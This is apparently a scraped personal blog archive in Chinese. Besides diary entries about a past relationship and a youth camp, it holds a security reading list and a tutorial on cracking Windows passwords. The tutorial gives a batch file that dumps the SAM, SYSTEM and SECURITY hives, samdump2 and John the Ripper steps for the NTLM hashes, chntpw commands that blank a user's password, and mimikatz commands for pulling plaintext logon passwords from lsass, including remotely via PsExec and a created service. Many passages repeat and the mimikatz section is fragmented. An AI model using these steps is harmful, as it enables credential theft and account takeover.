在我心裡,一直深埋自己不願意翻閱的情節。
只不過,我還是沒有辦法,完完全全不去想。
思緒偶然久了就會飄去哪裡。
為什麼那時候我要決定帶給人希望和快樂呢?
怎麼奇蹟就再你離去後消失到徹底。
要怎樣自己才不會再度受到傷害呢^^
Monday, September 28, 2015
Tuesday, August 25, 2015
Learning Resource In Computer Security and Digital Forensic[Books]
Books
Security:
1.Computer Security Principle and Practice 2011
2.Engineering Security by Peter Gutmann 2013
3.Essential System administration 3rd edition
4.Introduction to Information Security. A Strategic-Based Approach (2014)
5.Security Engineering by Roose Andeson
6.Introduction to Security and Network Forensic by William J.Buchanan
7.Corporate Computer and Network Security
Forensic Investigation:
1.Guide to Computer Forensics and Investigations (with DVD) 5th Edition by Bill Nelson
2.Digital Forensics with the AccessData Forensic Toolkit (FTK)|
10.File System Forensic Analysis[must read]
11.Forensic with open source tools
12.Hacking Exposed Computer Forensic
13.Understand Forensic Digital Imaging
Operating System architecture and Attacks:
1.Writing security tools and exploits by James C Foster
2.A bug hunter's diary a guided tour through the wilds of software security
3.Buffer Overflow Attacks
4.The Art of Software Security Assesment
5.Organization and Architecture Designing for Performance(8th Edition)
6.Discovering Computer
7.Exploiting Software How To Break Code
8.Writing Security Tools and Exploits
9.The Architecture of Computer Hardware,System Software and Networking
10.Modern Operating System
11.How computer works
Penetration Testing:
1.Basic Security Testing with Kali Linux 2.Google hacking v1 and v2
3.Gray Hat Hacking The Ethical Hackers Handbook, 4th Edition
4.Hacking: The Art of Exploitation, 2nd Edition
5.Metasploit: The Penetration Tester's Guide by Jim O'Gorman
6.Backtrack 5 Wireless Penetration Testing Beginner's guide
7.Instant Penetration Testing: Setting Up a Test Lab How-to
8.Backtrack 5 cook book /Backtrack 5 wirelsess penetration testing 9.Counter Hack Reloaded,2nd
10.A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
11.Hacker Techniques, Tools and Incident
12.Black Hat Python: Python Programming for Hackers and Pentesters
13.Kali Linux- Assuring Security by Penetration Testing by Allen, Lee 14.Learning Metasploit Exploitation and Development by Balapure, Aditya
15.No starch Metasploit 16.Penetration Testing : A hands on guide to hacking
17.The hacker Playbok 1 and 2
18.Ethical hacking and Penetration Testing Guide
Assembly Language:
1.Introduction to 64 bit windows Assembly Programming Ray Seyfarth
1.Cryptography and Network Security: Principles and Practice (6th Edition) by William Stallings
4.Introduction to Modern Cryptography, Second Edition (Chapman & Hall/CRC Cryptography and Network Security Series)
5.An Introduction to Mathematical Cryptography (Undergraduate Texts in Mathematics)
6.Cryptography: Theory and Practice, Third Edition (Discrete Mathematics and Its Applications)
7.Practical Cryptography
8.An Introduction to Number Theory with Cryptography
9.Implementing SSL / TLS Using Cryptography and PKI
10.Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Input Validation & More(Must Read)
11.Cryptography Engineering: Design Principles and Practical Applications 1st Edition
12.Modern Cryptanalysis: Techniques for Advanced Code Breaking
13.Malicious Cryptography: Exposing Cryptovirology
14.Cryptanalysis of Number Theoretic Ciphers (Computational Mathematics)
15.A Course in Number Theory and Cryptography (Graduate Texts in Mathematics)
16.Beginning Cryptography With Java(must Read)
17.Algorithmic Cryptanalysis (Chapman & Hall/CRC Cryptography and Network Security Series) 1st Edition
18.Applied Cryptanalysis - Breaking Ciphers in the Real World
19..BigNum Math - Implementing Cryptographic Multiple Precision Arithmetic
20.Codes - The Guide to Secrecy from Ancient to Modern Times
21.Cryptography for Developers
Reverse Engineering:
1.Sockets Shellcode Porting And Coding Reverse Engineering Exploits And Tool Coding For Security Professionals no secret
2.Reversing: Secrets of Reverse Engineering
3.Practical reverse engineering x86, x64, ARM, Windows Kernel, reversing tools, and obfuscation-Wiley
Malware Analyst:
1.Advanced Malware Analysis by Christopher Elisan
Linux and Shell Code:
1.CompTIA Linux+ Study Guide Exams (2013)
2.The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley
3. UNIX and Linux System Administration Handbook, 4th Edition
4.Linux Command line and shell scripting bible
5.Linux Kernal Development 3rd
6.A practical Guide to Linux Command,Editor and Shell Scripting
7. Linux Command Line and Shell Scripting Bible
8.Understand The Linux Kernel
9.How Linux Works What Every Superuser Should Know
10.Linux+ Guide to Linux Certification 3rd
11.Linux Bible 2013
12.Linux Fundamental by Paul Cobbaut
13.Linux in a nutshell
14.Linux System Programming
Linux Forensic:
1.Linux Forensics by Philip Polstra
Database Forensic:
1.The Database Hacker handbook
2.The Manga Guide to Database
3.Digital Image Forensics: There is More to a Picture than Meets the Eye
Windows Forensic:
1.Advance windows debugging by Mario Hewardt
2.Windows PowerShell Cookbook
3.Windows Registry Forensics Advance by Harlan Carvey
4.Windows 8.1 Bible
5.Windows 8.1 inside out
6.Hacking Exposed Windows 3rd Edition
7.Windows Forensic Analysis Toolkit. Advanced Analysis Techniques for Windows 8
8.Windows Forensic Analysis Toolkit, Advanced Analysis Techniques for Windows 7
9.Windows Sysinternals Administrator's Reference -Microsoft Press
10.Microsoft Windows Operating System Essentials by Tom Carpenter
11.Windows Internals(Part 1 and 2)
12.Windows Server 2012 R2 Inside Out, Configuration, Storage, & Essentials-Microsoft Press
Mac Forensic:
Will update Soon
Mobile Forensic:
1.Android Security Internals
2.Mobile Forensic Investigation: A guide to Evidence collection, analysis and presentation by Lee Reiber
3.Iphone and ios forensic by Andrew Hoong
4.Android Malware and Analysis-Auerbach Publications by Ken Dunham
5.Ios Forensic Analysis by Sean Morrissey
6.Iphone forensics:recovering evidences by Jonathan Zdziarski
Network Forensic
1.Network Attacks and Exploitation :A frame work by Matthew Monte
2.Wireshark for Security pro:Using wireshark and the metasploit framework Jessey Bullock
3.Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Gordon Fyodor Lyon
4.Wireshark Network Analysis, Second Edition by LauraChappel
5.The Tao of Network Security Monitoring: Beyond Intrusion Detection
6.Practical Packet Analysis:Using Wireshark to Solve Real-World Network Problems, 2nd Edition -No Starch Press (2011)
7.Cisco Networking Essentials
8.Hands on hacking and Network defence infosec
9.Modern Wireless attack
10.Network Forensics Tracking Hackers through Cyberspace
11.Nmap Cookbook:The Fat-free Guide to Network Scanning
12.Mastering Windows Network Forensics and Investigation
13. WireShark101
Web Attack:
1.SQL Injection Attacks and Defense, Second Edition
2.The Web Application Hacker's Handbook, Second Edition
3.The Tangled Web:A guide To Securing Modern Web Applications
4.XSS Exploits Cross Site Scripting Attacks and Defense
5.Web Application Obfuscation
6.The Web Application Hackers Handbook
7.Hacking Expose Web 2.0
Programming:
1.Python Forensic by Chet hosmer
2.Hacker Disassembling Uncovered: Powerful Techniques To Safeguard Your Programming
1.Hiding from the Internet: Eliminating Personal Online Information
2.Hacking Web Intelligence: Open Source Intelligence and Web Reconnaissance Concepts and Techniques
3.Personal Digital Security: Protecting Yourself from Online Crime
4.Tor and the Dark Art of Anonymity: How to Be Invisible from NSA Spying
5.Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady 6.Darknet: A Beginner's Guide to Staying Anonymous Online
Security:
1.Computer Security Principle and Practice 2011
2.Engineering Security by Peter Gutmann 2013
3.Essential System administration 3rd edition
4.Introduction to Information Security. A Strategic-Based Approach (2014)
5.Security Engineering by Roose Andeson
6.Introduction to Security and Network Forensic by William J.Buchanan
7.Corporate Computer and Network Security
Forensic Investigation:
1.Guide to Computer Forensics and Investigations (with DVD) 5th Edition by Bill Nelson
2.Digital Forensics with the AccessData Forensic Toolkit (FTK)|
3.Forensic Examination of Windows Supported File System by Doug Elrick
4.Computer Forensics with FTK by Fernando Carbone
5.Official (ISC)2® Guide to the CCFP CBK-Auerbach Publications,CRC Press
6.EC-Council-Investigating Data and Image [Computer forensic]
7.The official CHFI study guide
8.Computer Forensics and Cyber Crime An Introduction, 3rd Edition by Marjie T. Britz
9.Digital Evidence and Computer Crime, Third Edition Forensic Science, Computers, and the Internet-Academic Press10.File System Forensic Analysis[must read]
11.Forensic with open source tools
12.Hacking Exposed Computer Forensic
13.Understand Forensic Digital Imaging
Operating System architecture and Attacks:
1.Writing security tools and exploits by James C Foster
2.A bug hunter's diary a guided tour through the wilds of software security
3.Buffer Overflow Attacks
4.The Art of Software Security Assesment
5.Organization and Architecture Designing for Performance(8th Edition)
6.Discovering Computer
7.Exploiting Software How To Break Code
8.Writing Security Tools and Exploits
9.The Architecture of Computer Hardware,System Software and Networking
10.Modern Operating System
11.How computer works
Penetration Testing:
1.Basic Security Testing with Kali Linux 2.Google hacking v1 and v2
3.Gray Hat Hacking The Ethical Hackers Handbook, 4th Edition
4.Hacking: The Art of Exploitation, 2nd Edition
5.Metasploit: The Penetration Tester's Guide by Jim O'Gorman
6.Backtrack 5 Wireless Penetration Testing Beginner's guide
7.Instant Penetration Testing: Setting Up a Test Lab How-to
8.Backtrack 5 cook book /Backtrack 5 wirelsess penetration testing 9.Counter Hack Reloaded,2nd
10.A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers
11.Hacker Techniques, Tools and Incident
12.Black Hat Python: Python Programming for Hackers and Pentesters
13.Kali Linux- Assuring Security by Penetration Testing by Allen, Lee 14.Learning Metasploit Exploitation and Development by Balapure, Aditya
15.No starch Metasploit 16.Penetration Testing : A hands on guide to hacking
17.The hacker Playbok 1 and 2
18.Ethical hacking and Penetration Testing Guide
Assembly Language:
1.Introduction to 64 bit windows Assembly Programming Ray Seyfarth
2.Assembly Language for x86 Processors 6th Edition
3.Assembly Language Step by Step programming with Linux(must Read)
4.Professional AT & T Assembly Language
5.Introduction to assembly language programming for pentium and risc processors
6.KIP R. IRVINE-Assembly Language for x86 Processors-Pearson (must Read)
8.The Art of Assembly Language
9.Intel 64 and IA-32 Architectures Software Developer's Manual
Cryptography:3.Assembly Language Step by Step programming with Linux(must Read)
4.Professional AT & T Assembly Language
5.Introduction to assembly language programming for pentium and risc processors
6.KIP R. IRVINE-Assembly Language for x86 Processors-Pearson (must Read)
8.The Art of Assembly Language
9.Intel 64 and IA-32 Architectures Software Developer's Manual
1.Cryptography and Network Security: Principles and Practice (6th Edition) by William Stallings
2.Applied Cryptography: Protocols, Algorithms and Source Code in C
3.Break the Code: Cryptography for Beginners4.Introduction to Modern Cryptography, Second Edition (Chapman & Hall/CRC Cryptography and Network Security Series)
5.An Introduction to Mathematical Cryptography (Undergraduate Texts in Mathematics)
6.Cryptography: Theory and Practice, Third Edition (Discrete Mathematics and Its Applications)
7.Practical Cryptography
8.An Introduction to Number Theory with Cryptography
9.Implementing SSL / TLS Using Cryptography and PKI
10.Secure Programming Cookbook for C and C++: Recipes for Cryptography, Authentication, Input Validation & More(Must Read)
11.Cryptography Engineering: Design Principles and Practical Applications 1st Edition
12.Modern Cryptanalysis: Techniques for Advanced Code Breaking
13.Malicious Cryptography: Exposing Cryptovirology
14.Cryptanalysis of Number Theoretic Ciphers (Computational Mathematics)
15.A Course in Number Theory and Cryptography (Graduate Texts in Mathematics)
16.Beginning Cryptography With Java(must Read)
17.Algorithmic Cryptanalysis (Chapman & Hall/CRC Cryptography and Network Security Series) 1st Edition
18.Applied Cryptanalysis - Breaking Ciphers in the Real World
19..BigNum Math - Implementing Cryptographic Multiple Precision Arithmetic
20.Codes - The Guide to Secrecy from Ancient to Modern Times
21.Cryptography for Developers
Reverse Engineering:
1.Sockets Shellcode Porting And Coding Reverse Engineering Exploits And Tool Coding For Security Professionals no secret
2.Reversing: Secrets of Reverse Engineering
3.Practical reverse engineering x86, x64, ARM, Windows Kernel, reversing tools, and obfuscation-Wiley
Malware Analyst:
1.Advanced Malware Analysis by Christopher Elisan
2.Hacking Exposed :Malware and Rootkits
3.Predicting Malicious Behavior:Tools and Techniques for Ensuring by Gary M.Jackson
3.Predicting Malicious Behavior:Tools and Techniques for Ensuring by Gary M.Jackson
4.Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
5.The Rootkit Arsenal Escape and Evasion in the Dark Corners of the System, Second Edition
6.Malware Forensics Field Guide for Linux Systems Digital Forensics Field Guides-Syngress (2014)
6.Malware Forensics Field Guide for Linux Systems Digital Forensics Field Guides-Syngress (2014)
7.Malware Analyst Cookbook
8.Malware forensics Field guide for Windows Systems Digital Forensic Field Guides
9.Designing BSD rootkits an indtroduction to kernal hacking
10.Rookts Subverting the Windows Kernel
11.The Art of Memory Forensic Detecting Malware and Threats in Windows,Mac and Linux memory
8.Malware forensics Field guide for Windows Systems Digital Forensic Field Guides
9.Designing BSD rootkits an indtroduction to kernal hacking
10.Rookts Subverting the Windows Kernel
11.The Art of Memory Forensic Detecting Malware and Threats in Windows,Mac and Linux memory
1.CompTIA Linux+ Study Guide Exams (2013)
2.The Shellcoder's Handbook: Discovering and Exploiting Security Holes by Chris Anley
3. UNIX and Linux System Administration Handbook, 4th Edition
4.Linux Command line and shell scripting bible
5.Linux Kernal Development 3rd
6.A practical Guide to Linux Command,Editor and Shell Scripting
7. Linux Command Line and Shell Scripting Bible
8.Understand The Linux Kernel
9.How Linux Works What Every Superuser Should Know
10.Linux+ Guide to Linux Certification 3rd
11.Linux Bible 2013
12.Linux Fundamental by Paul Cobbaut
13.Linux in a nutshell
14.Linux System Programming
Linux Forensic:
1.Linux Forensics by Philip Polstra
Database Forensic:
1.The Database Hacker handbook
2.The Manga Guide to Database
3.Digital Image Forensics: There is More to a Picture than Meets the Eye
Windows Forensic:
1.Advance windows debugging by Mario Hewardt
2.Windows PowerShell Cookbook
3.Windows Registry Forensics Advance by Harlan Carvey
4.Windows 8.1 Bible
5.Windows 8.1 inside out
6.Hacking Exposed Windows 3rd Edition
7.Windows Forensic Analysis Toolkit. Advanced Analysis Techniques for Windows 8
8.Windows Forensic Analysis Toolkit, Advanced Analysis Techniques for Windows 7
9.Windows Sysinternals Administrator's Reference -Microsoft Press
10.Microsoft Windows Operating System Essentials by Tom Carpenter
11.Windows Internals(Part 1 and 2)
12.Windows Server 2012 R2 Inside Out, Configuration, Storage, & Essentials-Microsoft Press
Mac Forensic:
Will update Soon
Mobile Forensic:
1.Android Security Internals
2.Mobile Forensic Investigation: A guide to Evidence collection, analysis and presentation by Lee Reiber
3.Iphone and ios forensic by Andrew Hoong
4.Android Malware and Analysis-Auerbach Publications by Ken Dunham
5.Ios Forensic Analysis by Sean Morrissey
6.Iphone forensics:recovering evidences by Jonathan Zdziarski
Network Forensic
1.Network Attacks and Exploitation :A frame work by Matthew Monte
2.Wireshark for Security pro:Using wireshark and the metasploit framework Jessey Bullock
3.Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning by Gordon Fyodor Lyon
4.Wireshark Network Analysis, Second Edition by LauraChappel
5.The Tao of Network Security Monitoring: Beyond Intrusion Detection
6.Practical Packet Analysis:Using Wireshark to Solve Real-World Network Problems, 2nd Edition -No Starch Press (2011)
7.Cisco Networking Essentials
8.Hands on hacking and Network defence infosec
9.Modern Wireless attack
10.Network Forensics Tracking Hackers through Cyberspace
11.Nmap Cookbook:The Fat-free Guide to Network Scanning
12.Mastering Windows Network Forensics and Investigation
13. WireShark101
Web Attack:
1.SQL Injection Attacks and Defense, Second Edition
2.The Web Application Hacker's Handbook, Second Edition
3.The Tangled Web:A guide To Securing Modern Web Applications
4.XSS Exploits Cross Site Scripting Attacks and Defense
5.Web Application Obfuscation
6.The Web Application Hackers Handbook
7.Hacking Expose Web 2.0
Programming:
1.Python Forensic by Chet hosmer
2.Hacker Disassembling Uncovered: Powerful Techniques To Safeguard Your Programming
3.Gray Hat Python: Python Programming for Hackers and Reverse Engineers
4.Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor
Privacy and Data Hiding4.Violent Python: A Cookbook for Hackers, Forensic Analysts, Penetration Testers and Security Engineers by TJ O'Connor
1.Hiding from the Internet: Eliminating Personal Online Information
2.Hacking Web Intelligence: Open Source Intelligence and Web Reconnaissance Concepts and Techniques
3.Personal Digital Security: Protecting Yourself from Online Crime
4.Tor and the Dark Art of Anonymity: How to Be Invisible from NSA Spying
5.Social Engineering in IT Security: Tools, Tactics, and Techniques by Sharon Conheady 6.Darknet: A Beginner's Guide to Staying Anonymous Online
Monday, August 17, 2015
Crack Windows Password Part 2 : SAM File with Kali Linux
什么是SAM文件?
SAM(Security Account Manager)是Windows系統以HASH方式儲存用戶密碼的地方。
而被存儲HASH的格式NTLM,位置則是在C:\windows\system32\config\SAM。
使用Kali Linux & Windows 讀取SAM的步驟:Samdump2的方式
1. 由於Windows預設無法直接複製,刪除和移動SAM,Security 以及SYSTEM,因此,我寫了一個.Bat 文件來複製SAM文件。
2.Try.bat 文件程式碼如下:
@echo off
reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM
reg SAVE HKLM\SECURITY C:\SECURITY
exit
4.當3個File 複製完畢後,就可以把這3個File drag 到Kali Linux 的Desktop 裡面[我選擇儲存在Chapter2文件裡]。
5.之後用 samdump2 SYSTEM SAM > pikachu,txt 將SAM 文件轉換成txt 文件形式。
6.通過John the Ripper 工具,可以使用John --show 讓pikachu,txt 裡面的所有Hash全部呈現出來。
7.最後用OP crack 或者Online NTLM Cracker 來將hash 轉換會原來的文字就大功告成了。
原本電腦密碼為:Banana
SAM(Security Account Manager)是Windows系統以HASH方式儲存用戶密碼的地方。
而被存儲HASH的格式NTLM,位置則是在C:\windows\system32\config\SAM。
使用Kali Linux & Windows 讀取SAM的步驟:Samdump2的方式
1. 由於Windows預設無法直接複製,刪除和移動SAM,Security 以及SYSTEM,因此,我寫了一個.Bat 文件來複製SAM文件。
2.Try.bat 文件程式碼如下:
@echo off
reg SAVE HKLM\SAM C:\SAM
reg SAVE HKLM\SYSTEM C:\SYSTEM
reg SAVE HKLM\SECURITY C:\SECURITY
exit
4.當3個File 複製完畢後,就可以把這3個File drag 到Kali Linux 的Desktop 裡面[我選擇儲存在Chapter2文件裡]。
5.之後用 samdump2 SYSTEM SAM > pikachu,txt 將SAM 文件轉換成txt 文件形式。
6.通過John the Ripper 工具,可以使用John --show 讓pikachu,txt 裡面的所有Hash全部呈現出來。
7.最後用OP crack 或者Online NTLM Cracker 來將hash 轉換會原來的文字就大功告成了。
原本電腦密碼為:Banana
使用Kali Linux & Windows 讀取SAM的步驟: 重置系統密碼
1.Live Boot Kali Linux
2,進入C:Drive 複製3個File(SYSTEM ,SECURITY and SAM)
3.輸入chntpw -l SAM, 會顯示SAM裡面所有用戶的資料。
4.輸入chantpw -u "bluebear171" SAM 後,你可以更換/清空用戶電腦密碼。
5. 選擇1,清空密碼
6. q for Exit
1.Live Boot Kali Linux
2,進入C:Drive 複製3個File(SYSTEM ,SECURITY and SAM)
3.輸入chntpw -l SAM, 會顯示SAM裡面所有用戶的資料。
4.輸入chantpw -u "bluebear171" SAM 後,你可以更換/清空用戶電腦密碼。
5. 選擇1,清空密碼
6. q for Exit
附加神器:mimikatz 2.0 目前支持所有Windows系統(Windows10
can)
介紹:此工具能直接從Isass.exe直接獲取Windows處於Active狀態賬號的明文密碼。亦能配合Metasploit 使用。
下載地址:http://blog.gentilkiwi.com/mimikatz
步驟如下:
1. Open Mimikatz.exe (32/64bit) with Admin 權限
2. 提升權限 :privilege::debug
3. 注入dll : inject::process lsass.exe sekurlsa.dll
4. 提取密碼:sekurlsa::logonpasswords 介紹:此工具能直接從Isass.exe直接獲取Windows處於Active狀態賬號的明文密碼。亦能配合Metasploit 使用。
下載地址:http://blog.gentilkiwi.com/mimikatz
步驟如下:
1. Open Mimikatz.exe (32/64bit) with Admin 權限
2. 提升權限 :privilege::debug
3. 注入dll : inject::process lsass.exe sekurlsa.dll
密碼不到1秒鐘就顯示出來了
5. Module sekurlsa 參考表
6. 遠程終端的方式
Needed Files
a)mimikatz_trunktoolsPsExec.exe
Needed Files
a)mimikatz_trunktoolsPsExec.exe
b) mimikatz_trunkWin32mimikatz.exe
c) mimikatz_trunkWin32sekurlsa.dll
c) mimikatz_trunkWin32sekurlsa.dll
1. PsExec.exe
启动
。
2.
运行
cmd.exe
,或者直接运行
mimikatz.exe
psexec
-s
cmd.exe
3
启动
mimikatz.exe
C:\mimikatz_trunk\Win32\mimikatz.exe
4.
提升权
限
privilege::debug
5.//
注入
dll
,(可以有空格
)
inject::process
lsass.exe
"C:\mimikatz_trunk\Win32\sekurlsa.dll"
6.//
抓取密
码
@getLogonPasswords
7.
exit
*******************************************************
//
创建服务方
法
sc
create
getpassword binpath=
"cmd.exe /c
c:\xxx\mimikatz.exe < command.txt > password.txt"
sc
start getpassword
sc
delete
getpassword
Friday, June 26, 2015
想想就好
紫@星
看會很久很久很久前度的部落格,看到那句話
[如果現在的我們還在一起會是怎樣?]
如果那年的我能做對選擇,繼續和你發展下去,而不是因為往事而傷心,我想自己現在一定會很幸福,也不必再之後經歷那麼多不愉快的事啊 ^-^【也只有這段感情會有最有感覺的互相稱呼】
#坦白說這是唯一一段我主動提出,卻是最不應該放棄的愛情
忽然想想,當初自己幹嘛那麼笨要為一些不值得的事情傷沒有意義的心哈哈哈哈哈哈哈哈哈
不過,在怎樣都希望你能一切安好啦。
再有一次機會,我想我不會放手了XDD :P
貌似很難吧,雖然認真想到,有時候還是會想想,現在的你怎麼樣了。
起碼,你沒有讓我傷心過,謝謝你啊^0^
雖然到現在還是沒見到面的機會。有緣分的話還是會遇見的
看會很久很久很久前度的部落格,看到那句話
[如果現在的我們還在一起會是怎樣?]
如果那年的我能做對選擇,繼續和你發展下去,而不是因為往事而傷心,我想自己現在一定會很幸福,也不必再之後經歷那麼多不愉快的事啊 ^-^【也只有這段感情會有最有感覺的互相稱呼】
#坦白說這是唯一一段我主動提出,卻是最不應該放棄的愛情
忽然想想,當初自己幹嘛那麼笨要為一些不值得的事情傷沒有意義的心哈哈哈哈哈哈哈哈哈
不過,在怎樣都希望你能一切安好啦。
再有一次機會,我想我不會放手了XDD :P
貌似很難吧,雖然認真想到,有時候還是會想想,現在的你怎麼樣了。
起碼,你沒有讓我傷心過,謝謝你啊^0^
雖然到現在還是沒見到面的機會。有緣分的話還是會遇見的
Monday, June 22, 2015
第20届绿色环保学记全国营(霹雳区)
今年是我第五年參加全國營了,還是很遺憾去年柔佛區沒有開放探班。
除了參加全國營,也是為了履行守護之心的責任,但是無可奈何,好像很忙的關係,所以這個願望就暫時放一邊,盡情享受全國營了。
到了怡保火車站,竟然下大雨了=-= |
拖著那麼重的行李在雨天步行至巴士站真的很麻煩啊,還好距離超近的5分鐘那樣就到了。
問巴士司機去育才多少錢,跟我講RM2.60,覺得還好就給司機了,第二次去搭的時候才知道原來我給多錢了。PS: 只需要RM1
很不人道啊!小錢失去就無所謂啦哈哈哈。
到營地後,在懵懵懂懂之下把行李放去了探班室。走到禮堂附近見到森州4個森州的學弟妹們就和他們聊了起來。這時候營員們應該都還在玩破冰遊戲吧。
除了參加全國營,也是為了履行守護之心的責任,但是無可奈何,好像很忙的關係,所以這個願望就暫時放一邊,盡情享受全國營了。
到了怡保火車站,竟然下大雨了=-= |
拖著那麼重的行李在雨天步行至巴士站真的很麻煩啊,還好距離超近的5分鐘那樣就到了。
問巴士司機去育才多少錢,跟我講RM2.60,覺得還好就給司機了,第二次去搭的時候才知道原來我給多錢了。PS: 只需要RM1
很不人道啊!小錢失去就無所謂啦哈哈哈。
到營地後,在懵懵懂懂之下把行李放去了探班室。走到禮堂附近見到森州4個森州的學弟妹們就和他們聊了起來。這時候營員們應該都還在玩破冰遊戲吧。
之後還遇到了東海岸和柔佛的探班們,大家在圖書館前面中間的空地聊得不亦樂乎,我也見到了我當學記時候認識的全國營組員-雯順^0^
探班們的合照在這裡:
第二天早餐是蛋撻^^
和東海岸的在學校對面的等巴士,第一次巴士來的時候,有幾個好像不懂吃錯什麼藥拼命對巴士招手,可是巴士沒停下因為真的是人太多了,順便提提,我學會了愛的古啊莫,科科超爽的。
圖:很美味的蛋撻^0^
來到Ipoh Parade 只為了找午餐,真是的哈哈。我那天的午餐是排骨王飯^^
接著就是危險發生的時刻了,忽然間我轉頭一看,看見那個平時Steamboot 的煤氣小罐著火了,而身邊就有一個嬰兒坐在嬰兒椅子上。只有雯順記得上前把小孩抱走再直接把話滅掉,整個過程十分短,大家還來不及反應,孩子就被救了下來了。 再一次為英勇的他鼓掌吧。^^
2點50分的電影San Andreas,要等好久啊, 又是到處亂亂逛啊,我們連大眾書局都不放過嘿嘿。沒錢買書的我真可憐 :P 因為要留到明天和後天繼續用。在戲院的流動廣告版,葉子一直很期待破風電影廣告的出現,可是還是白等了,大家也因為這個笑話一直笑她哈哈。最好笑的是連續出現2次在不同的流動廣告版,但依然MISS掉了。在看電影前,幸運的去了李小龍的畫展,那邊展出的作品水準還真高,有些畫讓我很喜歡,原諒我這裡沒有拍到照片啊。
這部電影其實是我預料之外會去觀賞的,不過就如別人說所的一樣開場到結束都很緊張刺激。和地震有關的一部電影也覺得就算不會遇上地震,但也起碼都要懂得一些地震該有的避難知識,因為說不上哪一天也可以派上用場。
在回去之前去了附近的糖水街吃了很不錯的Ice Kacang,坦白說一個人吃是真的吃不完的啊。
之後本來想走去別的地方看看的,結果走著走著就走到了怡保大草場,也沒關係啦,期間發覺到每個人過馬路都有不一樣的風格呢,在多一下子就很順利的上到巴士回到學校了。
一進校門見到了身穿去年飢餓30衣服而且又是十分熟悉的背影。第一感覺就是知道會遇見誰了。心裡也不知道為什麼很害怕的見到這一幕。直接放慢腳步讓全部東海岸的學記走前去,而我自己也乘著這個機會繞草場那邊回到探班宿舍,因為情緒還是不穩定,所以為了給自己冷靜下來就在樓上休息。結論:後來見到也沒有什麼事情了,反正就是沒有在乎什麼了。
這裡要插入一件小事情
7區展覽時候,有口福吃了叉燒包啦啦啦拉。其實本身很喜歡霹靂區弄得凱莉城堡。這裡代表雪隆區感謝有購買學情記憶的探班/營員,其實比較想感謝東海岸的學記來光顧他們哈哈。
過後遇上了雪隆區26屆蘋果學弟(政陽)和垠仲還有28屆的YC,我們都等著Yi Zhuang 學妹的到來,後來大家都在聊天旋空還有一些我還不知道的故事,不過都是聽了就算的哈哈。期間眼角偶然出現應該曾經認識的人,但依然零交流,或許我還是需要很長很長的時間去釋懷那一件事情。
時間很快轉移到全國營最精彩的一天
早上,很早就醒來了,走到樓下看到營員們都準備乘搭Perak Transit 到舊街場走走。而我也不落人後,和自己區的學弟學妹去完了怡保舊街場和新街場的壁畫。最開心的還是在南香哪裡吃了很豐富的早餐,全部人平分錢才RM7.50而已很便宜。
享受在尋找壁畫的我們
走完後,我也很衝忙的趕到了怡保火車站,火車站前都是學記,又是難得一見的人山人海學記版。雖然站在後面拍大合照但是也是最最最最難的在全國營的一張合照因為是和全部營員,工委,其他探班等的大合照。
那天的晚餐是Maggie Goreng,是和東海岸的學記在學校後面的餐館吃的。走著去還有等著晚餐的時間他們竟然講18++的東西哈哈哈哈,不過真的太好笑了:p 什麼鬼成千上萬次的經驗,你很神啊!!科科^^
那個員工也是太可愛了,是把單麵改成Double不是叫你另外煮過,結果來了17碗面=-=||
男生之後要吃完多出來的分>.< 可憐自己吃不完第2碗。
原始部落之夜開始啦,很可惜前面的部分自己錯過了TVT,因為臨時發生突發狀況,馬六甲學記臨時找我借電腦把表演歌曲拷貝進隨身碟裡面。不過那時候自己跑回宿舍結果流汗了TVT。
個人很喜歡東海岸的手語表演,還有團康組+其他區很盡心盡力的再一次以不間斷的方式把場面都炒熱起來。搭著肩膀走可是很傳統啊,而當熟悉的歌曲想起時候,又會想到以前的全國營/別區探班時候有跳過的團康舞。自己還有機會跑上台一整子啦啦啦拉。自己和雪隆區&東海岸的探班/營員,那時候還真的很享受的跑到很前面去哈哈。
當霹靂區27屆唱著海闊天空時候,真的很感觸,因為這首歌對他們來說有著很多的回憶,因為上次30週年晚宴時候也是有著一首歌出現,印象也特別深刻。這時候我是坐在地上的,忽然我肩膀多了一直手,往旁邊一看,原來是東海岸的營員啊,結果大家就一起跟著營員唱起歌來,那時候還不知道她的名字。
還有霹靂區個人獨舞秀也超帥的。
最好一天天,很感謝馬六甲的探班請吃的蛋撻,謝謝啦。而我的早餐也因此有著落了。自己去食堂拿了早餐,見到營員紛紛都去買Oreo巧克力冰,自己也買了一杯來試試吃著的時候,秀君學妹來了,聊了一陣子還吃了一點我還沒開始吃的早餐,吃不飽跟食堂拿啊啊@@。就問為什麼那麼得空去認識那麼多探班,答案竟然是跟我說全國營不好玩???>.< 我當下覺得納悶,沒有理由啊。再問清楚原來她以前有去過全國營,所以才和我說當探班其實比較好那樣咯。
P.s:
回家前1個小時半,自己忽然想到寫感言給29屆的學弟學妹看。
現在在寫出來就是重複寫第三次了。我很懶惰啊
重點:
1.珍惜全國營給你們的回憶
2.不要玩到自己累到,無法應付寶貝營
3.把100%微笑和動力帶給會遇到的小孩子營員們
4.做好28屆的吩咐,不要給他們那麼PekChek 你們啊^^
就這麼多吧 By B24059
(我有去看你們準備營會啊,只是一整子,還是赴約了哦)
也因為這個全國營認識了你們一部分人啊,培訓營還是可以看到我回來的啊。
我記得名字的有Shao Hong, Adrian Lim,Yu An, 菜紳士其他的以後還有機會被我記得的啊
很不捨得離開營地,不過還是要啟程回家,還好等到巴士,嚇到我以為來不及上火車,之後還要拖著重重的行李走去火車站哈哈哈
乘搭火車ETS回家的時候才發覺火車上有插座的。巧合是森州學記就坐我後面那一排而已,也不知道是他們去換票還是那麼巧啊。
探班們的合照在這裡:
還有很照顧探班的QiHong.
